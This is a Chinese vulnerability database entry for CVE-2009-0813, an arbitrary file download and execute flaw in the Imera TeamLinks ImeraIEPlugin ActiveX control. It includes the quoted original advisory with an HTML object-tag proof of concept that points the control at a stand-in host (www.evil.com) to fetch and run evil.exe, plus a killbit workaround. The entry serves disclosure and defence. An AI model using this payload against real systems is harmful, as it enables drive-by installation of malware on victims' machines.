Imera ImeraIEPlugin ActiveX控件任意文件下载漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117442 漏洞类型 输入验证
发布时间 2009-03-03 更新时间 2009-03-10
CVE编号 CVE-2009-0813 CNNVD-ID CNNVD-200903-094
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8144
https://www.securityfocus.com/bid/33993
https://cxsecurity.com/issue/WLB-2009030008
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-094
|漏洞详情
ImeraTeamLinks是桌面客户端软件,允许物理分不断组成员之间进行协作。TeamLinks客户端的ImeraIEPlugin.dll库所提供的ImeraIEPlugin.Pilot.1ActiveX控件没有正地的处理DownloadHost属性参数,如果用户受骗访问了恶意站点并向该属性传送了恶意参数的话,就可能导致向用户系统下载并执行任意文件。
|漏洞EXP
Who:
 Imera(http://www.imera.com)
 Imera TeamLinks Client(http://teamlinks.imera.com/install.html)

What:
 ImeraIEPlugin.dll
 Version 1.0.2.54
 Dated 12/02/2008
 {75CC8584-86D4-4A50-B976-AA72618322C6}
 http://teamlinks.imera.com/ImeraIEPlugin.cab

How:
 This control is used to install the Imera TeamLinks Client
package. The control fails to validate the content that it is to
download and install is indeed the Imera TeamLinks Client software.

Exploiting this issue is quite simple, like so:

<object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
id="obj">
	<param name="DownloadProtocol" value="http" />
	<param name="DownloadHost" value="www.evil.com" />
	<param name="DownloadPort" value="80" />
	<param name="DownloadURI" value="evil.exe" />
</object>

Fix:
 The vendor has been notified.

Workaround:
 Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html

Elazar

# milw0rm.com [2009-03-03]
|受影响的产品
Imera Systems ImeraIEPlugin 1.0.2 .54
|参考资料

来源:XF
名称:imera-imeraieplugin-code-execution(49028)
链接:http://xforce.iss.net/xforce/xfdb/49028
来源:VUPEN
名称:ADV-2009-0591
链接:http://www.vupen.com/english/advisories/2009/0591
来源:MILW0RM
名称:8144
链接:http://www.milw0rm.com/exploits/8144
来源:SECUNIA
名称:34103
链接:http://secunia.com/advisories/34103